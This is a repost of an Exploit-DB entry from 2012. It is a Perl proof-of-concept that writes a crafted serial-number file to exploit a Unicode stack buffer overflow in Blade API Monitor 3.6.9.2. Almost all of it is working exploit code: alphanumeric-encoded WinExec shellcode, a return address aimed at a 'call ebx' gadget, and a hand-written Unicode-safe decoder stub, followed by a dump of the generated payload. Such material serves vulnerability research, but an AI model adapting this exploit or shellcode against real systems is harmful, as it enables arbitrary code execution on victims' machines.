Blade API Monitor 3.6.9.2 – Unicode Stack Buffer Overflow

  • 作者: FullMetalFouad
    日期: 2012-01-10
  • 来源:https://www.exploit-db.com/exploits/18349/
  • # Exploit Title: Blade API Monitor Unicode Stack Buffer Overflow (the serial number!!)
    # Date: 25/12/2011
    # Author: FullMetalFouad
    # Version: 3.6.9.2
    # Tested on: Windows XP/7
    ################################################################
    
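    use strict;
    use warnings;

    # Output file for the generated proof-of-concept input described above.
    my $file = "bof_blade.txt";

    # windows/Winexec - 178 bytes
    # VERBOSE=false, EXITFUNC=process, CMD=calc encoder=Alpha3
    # ALPHA3\ALPHA3.py x86 ascii mixedcase eax --input="C:\calc_shellcode\calc.txt" --verbose
    my $shellcode_calc =
        "hffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J" .
        "0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I" .
        "2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W" .
        "0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p" .
        "034r032m334t3w3m02";

    #
    # first stage to prepare the $shellcode_calc execution :
    # ALPHA3\ALPHA3.py x86 ascii mixedcase eax --input="C:\calc_shellcode\shellcode.txt" --verbose
    # "\x05\xF6\xFC\xFF\xFF"   ;# sub eax, 30A
    # "\x33\xDB"               ;# xor ebx,ebx
    # "\x33\xC9"               ;# xor ecx,ecx
    # "\xFE\xC5"               ;# inc ch
    #
    # "\x43"                   ;# inc ebx
    # "\x8A\x14\x58"           ;# mov dl, [eax+ebx*2]
    # "\x88\x14\x18"           ;# mov [eax+ebx], dl
    # "\xE2\xF7"               ;# loop
    # "\xFF\xE0"               ;# jmp eax
    my $shellcode =
        "hffffk4diFkTpk02Tpl0T0Bu" .
        "EE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0m";

    # Filler up to the saved registers (sizes as determined by the author).
    my $junk1 = "\xCC" x 104;
    $junk1 .= "\x35" x 2;   # ECX
    $junk1 .= "\x41" x 6;   # EBP

    my $eip = "\x3e\x43"; # 0x0043003e : call ebx | startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READ} [BladeAPIMonitor.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.6.9.2 (C:\Program Files\BladeAPIMonitor\BladeAPIMonitor.exe)
    my $junk2  = "\x42" x 20;
    my $buffer = "\x41" x 246;

    my $part0 = "";
    my $part1 = "";
    my $part2 = "";
    my $part3 = "";

    # 0 part : we do EAX = EBX + length(part0+part1+part2 +1 ), to point to the first null byte of the loop code.
    #                                   #   _part_0_:__________________________________________________
    $part0 .= "\x53";          # | 53push ebx |
    $part0 .= "\x45";          # | 004500add [ebp+0x0],al(nop)|
    $part0 .= "\xBA\x58\x58";  # | BA00580058mov edx, 58005800|
    $part0 .= "\x45";          # | 004500add [ebp+0x0],al |
    $part0 .= "\x54";          # | 54push esp |
    $part0 .= "\x45";          # | 004500add [ebp+0x0],al(nop)|
    $part0 .= "\x5F";          # | 5Fpop edi|
    $part0 .= "\x45";          # | 004500add [ebp+0x0],al(nop)|
    $part0 .= "\xB9\x3B\x3B";  # | B9003B003Bmov ecx, 3B003B00(diff)|
    $part0 .= "\xF5";          # | 00F5add ch,dh|
    $part0 .= "\x6F";          # | 006F00add [edi+0x0],ch |
    $part0 .= "\xD6";          # | D6salc |
    $part0 .= "\x45";          # | 004500add [ebp+0x0],al(nop)|
    $part0 .= "\x5B";          # | 5Bpop ebx|
    $part0 .= "\x45";          # | 004500add [ebp+0x0],al(nop)|
    $part0 .= "\x50";          # | 50push eax |
    $part0 .= "\x45";          # | 004500add [ebp+0x0],al(nop)|
    $part0 .= "\x54";          # | 54push esp |
    $part0 .= "\x45";          # | 004500add [ebp+0x0],al(nop)|
    $part0 .= "\x58";          # | 58pop eax|
    $part0 .= "\x45";          # | 004500add [ebp+0x0],al(nop)|
    $part0 .= "\xC1\x19";      # | C10019rol dword ptr [eax], 19|
    $part0 .= "\x45";          # | 004500add [ebp+0x0],al(nop)|
    $part0 .= "\x58";          # | 58pop eax|
    $part0 .= "\xC7";          # | 00C7add bh,al|
    $part0 .= "\x45";          # | 004500add [ebp+0x0],al(nop)|
    $part0 .= "\x53";          # | 53push ebx |
    $part0 .= "\x45";          # | 004500add [ebp+0x0],al(nop)|
    $part0 .= "\x58";          # | 58pop eax|
    $part0 .= "\x45";          # | 004500add [ebp+0x0],al(nop)|
    $part0 .= "\x52";          # | 52push edx |
    $part0 .= "\x45";          # | 004500add [ebp+0x0],al(nop)|
    ##################################### |__________________________________________________________|


    # 1st part : we do EBX=0x00000000, and ECX=0x00000100 (approximative size of buffer)
    #                                   #   _part_1_:__________________________________________________
    $part1 .= "\x6A";          # | 6A00push dword 0x00000000|
    $part1 .= "\x6A";          # | 6A00push dword 0x00000000|
    $part1 .= "\x5B";          # | 5Bpop ebx|
    $part1 .= "\x45";          # | 004500add [ebp+0x0],al(nop)|
    $part1 .= "\x59";          # | 59pop ecx|
    $part1 .= "\x45";          # | 004500add [ebp+0x0],al(nop)|
    $part1 .= "\xBA\x01\x41";  # | BA00010041mov edx,0x41000100 |
    $part1 .= "\xF5";          # | 00F5add ch,dh|
    ##################################### |__________________________________________________________|

    # 2nd part : The patching of the 'loop code' :
    #                                   #   _part_2_:__________________________________________________
    $part2 .= "\x45";          # | 004500add [ebp+0x0],al |
    $part2 .= "\x5A";          # | 5Apop edx|
    $part2 .= "\x45";          # | 004500add [ebp+0x0],al |
    $part2 .= "\xC6\x32";      # | C60032mov byte [eax],0x32 ; 0x8A-0x58|
    $part2 .= "\x70";          # | 007000add [eax+0x0],dh |
    $part2 .= "\x40";          # | 40inc eax|
    $part2 .= "\x45";          # | 004500add [ebp+0x0],al |
    $part2 .= "\x40";          # | 40inc eax|
    $part2 .= "\x70";          # | 007000add [eax+0x0],dh; 0x58 |
    $part2 .= "\x40";          # | 40inc eax|
    $part2 .= "\x70";          # | 007000add [eax+0x0],dh; 0x88dh=58|
    $part2 .= "\x40";          # | 40inc eax|
    $part2 .= "\x45";          # | 004500add [ebp+0x0],al |
    $part2 .= "\xC6\x14";      # | C60014mov byte [eax],0x14 ; 0x14 |
    $part2 .= "\x45";          # | 004500add [ebp+0x0],al |
    $part2 .= "\x40";          # | 40inc eax|
    $part2 .= "\x45";          # | 004500add [ebp+0x0],al |
    $part2 .= "\x40";          # | 40inc eax|
    $part2 .= "\x45";          # | 004500add [ebp+0x0],al |
    $part2 .= "\xC6\xE2";      # | C600E2mov byte [eax],0xE2 ; 0xE2 |
    $part2 .= "\x45";          # | 004500add [ebp+0x0],al |
    $part2 .= "\x40";          # | 40inc eax|
    $part2 .= "\x45";          # | 004500add [ebp+0x0],al |
    # |__________________________________________________________|

    # 3rd part : The loop code (stuffed with nulls of course)
    #                                   #   _part_3_:___________________________________________________
    #                                   #   | ; eax points to our shellcode|
    #                                   #   | ; ebx is 0x00000000|
    #                                   #   | ; ecx is 0x00000500 (for example)|
    #                                   #   ||
    #                                   #   | label: |
    $part3 .= "\x43";          # | 43inc ebx|
    $part3 .= "\x14";          # | 8A1458mov byte dl,[eax+2*ebx]|
    $part3 .= "\x30\x18";      # | 881418mov byte [eax+ebx],dl|
    $part3 .= "\xF7";          # | E2F7loop label |
    #                                   #   |__________________________________________________________|

    my $finder = $part0 . $part1 . $part2 . $part3;

    # Lexical handle, three-argument open and an explicit error check: the
    # original two-argument `open($FILE, ">$file")` never reported failure and
    # would let mode characters in $file change how the file is opened.
    open my $fh, '>', $file or die "open $file: $!";
    # The content is raw bytes, so keep the handle free of any text-mode
    # newline translation on platforms that do it.
    binmode $fh;
    print {$fh} $shellcode_calc, $junk1, $eip, $junk2, $finder, $shellcode,
        "\xFF\xFF\xFF\xFF", $buffer, "\x43\x43\x43\x43";
    # Buffered write errors only surface at close, so check it too.
    close $fh or die "close $file: $!";
    print "File Created successfully\n";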
    
    # output: hffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p034r032m334t3w3m02ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ55AAAAAA>CBBBBBBBBBBBBBBBBBBBBSEºXXETE_E¹;;õoÖE[EPETEXEÁEXÇESEXEREjj[EYEºAõEZEÆ2p@E@p@p@EÆE@E@EÆâE@EC0÷hffffk4diFkTpk02Tpl0T0BuEE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0mÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCChffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p034r032m334t3w3m02ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ55AAAAAA>CBBBBBBBBBBBBBBBBBBBBSEºXXETE_E¹;;õoÖE[EPETEXEÁEXÇESEXEREjj[EYEºAõEZEÆ2p@E@p@p@EÆE@E@EÆâE@EC0÷hffffk4diFkTpk02Tpl0T0BuEE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0mÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCC